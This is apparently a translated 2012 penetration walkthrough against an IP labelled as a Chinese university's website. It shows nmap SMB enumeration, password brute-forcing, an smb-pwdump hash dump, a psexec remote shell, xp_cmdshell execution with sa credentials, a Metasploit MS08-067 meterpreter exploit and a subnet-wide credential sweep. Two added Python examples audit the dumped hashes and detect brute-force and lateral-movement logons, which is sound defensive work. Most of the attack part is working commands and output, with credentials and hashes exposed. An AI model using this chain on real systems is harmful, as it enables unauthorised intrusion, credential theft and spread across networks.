Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser // scan results

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
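What a defender should read out of a dump in that format, as an added example that is not part of the original post or of nmap/pwdump: it parses smb-pwdump-style "user:rid => LM:NT" lines and flags blank passwords, the built-in RID 500 account, LM hashes that are still being stored, and LM hashes whose second half is the empty block (so the password is at most 7 characters). The usernames and hex values in SAMPLE are constructed; only the empty-password constants are the well-known ones.

```python
import re

# Well-known constants: the LM hash of an empty password is two copies of the
# hash of one empty 7-byte half; the NT hash of an empty password is also fixed.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# smb-pwdump prints "user:rid => LM:NT" and substitutes "NO PASSWORD***..."
# for an empty hash, so accept either a 32-hex-digit hash or that marker.
HASH = r"(?:[0-9A-Fa-f]{32}|NO PASSWORD\**)"
LINE_RE = re.compile(r"^\|?_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*"
                     rf"(?P<lm>{HASH}):(?P<nt>{HASH})")

def audit_line(line):
    """Return (user, rid, findings) for one dump line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    user, rid = m.group("user"), int(m.group("rid"))
    lm, nt = m.group("lm").upper(), m.group("nt").upper()
    lm_empty = lm.startswith("NO PASSWORD") or lm == EMPTY_LM
    nt_empty = nt.startswith("NO PASSWORD") or nt == EMPTY_NT
    findings = []
    if nt_empty:
        findings.append("blank password")
    if rid == 500:
        findings.append("built-in Administrator account (RID 500)")
    if not lm_empty:
        # An LM hash is present only if the host still stores LM hashes; LM is
        # case-insensitive and split into two 7-character halves, so it is weak.
        findings.append("LM hash stored (NoLMHash not enforced)")
        if lm.endswith(EMPTY_LM_HALF):
            findings.append("password is 7 characters or fewer")
    return user, rid, findings

def audit_dump(text):
    """Map each user in a dump to its findings (an empty list means nothing flagged)."""
    results = {}
    for line in text.splitlines():
        parsed = audit_line(line)
        if parsed:
            results[parsed[0]] = parsed[2]
    return results

# Constructed sample in the smb-pwdump output format; the hex values are made
# up apart from the well-known empty-password constants.
SAMPLE = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| svc_backup:1002 => 0123456789ABCDEFAAD3B435B51404EE:FEDCBA98765432100123456789ABCDEF
|_nolm_user:1003 => AAD3B435B51404EEAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF
"""
```

Run audit_dump over a real dump and any user with a non-empty findings list needs a password change or a policy fix (NoLMHash, minimum length).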

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole // use the MS08-067 exploit in msf against the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.
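What the password guessing against one host and the subnet-wide login sweep above look like in centralised logs, as an added detection example that is not part of the original post: it replays constructed Windows 2000 Security log records (event 529 = failed logon, 528 = successful logon, logon type 3 = network, which is what SMB authentication produces) and raises an alert for a failure burst from one source, for a success right after such a burst, and for one source authenticating to many hosts in a short window. The record format, the hostnames and the 192.168.1.50 source address are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Windows 2000 Security log ids: 529 = logon failure, 528 = successful logon.
# Logon type 3 (network) is what SMB authentication from smb-brute,
# smb-pwdump or psexec produces on the target.
FAIL, SUCCESS, NETWORK = 529, 528, 3

def parse(line):
    """One constructed, centralised record: 'time host event_id logon_type user source'."""
    t, host, eid, ltype, user, src = line.split()
    return datetime.strptime(t, "%Y-%m-%dT%H:%M:%S"), host, int(eid), int(ltype), user, src

def detect(lines, window=timedelta(seconds=60), fail_threshold=5, host_threshold=3):
    """Return (kind, source) alerts: 'guessing' for a failure burst, 'guess-success'
    for a success right after one, 'lateral' for one source reaching many hosts."""
    alerts, fails, successes = [], defaultdict(list), defaultdict(list)
    for t, host, eid, ltype, user, src in sorted(parse(l) for l in lines):
        if ltype != NETWORK:
            continue  # interactive logons are out of scope for this check
        if eid == FAIL:
            fails[src] = [x for x in fails[src] if t - x <= window] + [t]
            if len(fails[src]) == fail_threshold:
                alerts.append(("guessing", src))
        elif eid == SUCCESS:
            if len(fails[src]) >= fail_threshold and t - fails[src][-1] <= window:
                alerts.append(("guess-success", src))
                fails[src] = []  # report each burst once
            successes[src] = [x for x in successes[src] if t - x[0] <= window] + [(t, host)]
            if len({h for _, h in successes[src]}) == host_threshold:
                alerts.append(("lateral", src))
    return alerts

# Constructed sample: 192.168.1.50 guesses passwords against web01, then uses the
# credential on several other hosts; 192.168.1.20 is a user who mistyped once.
SAMPLE = """\
2012-02-28T22:17:01 web01 529 3 administrator 192.168.1.50
2012-02-28T22:17:02 web01 529 3 administrator 192.168.1.50
2012-02-28T22:17:02 web01 529 3 test 192.168.1.50
2012-02-28T22:17:03 web01 529 3 test 192.168.1.50
2012-02-28T22:17:04 web01 529 3 test 192.168.1.50
2012-02-28T22:17:05 web01 528 3 test 192.168.1.50
2012-02-28T22:17:30 fs01 529 3 jsmith 192.168.1.20
2012-02-28T22:17:31 fs01 528 2 jsmith 192.168.1.20
2012-02-28T22:40:10 fs01 528 3 administrator 192.168.1.50
2012-02-28T22:40:11 db01 528 3 administrator 192.168.1.50
2012-02-28T22:40:12 ws07 528 3 administrator 192.168.1.50
""".splitlines()
```

The same three patterns are the ones to alert on regardless of log source; on newer Windows the ids are 4625 and 4624 with the same logon type field.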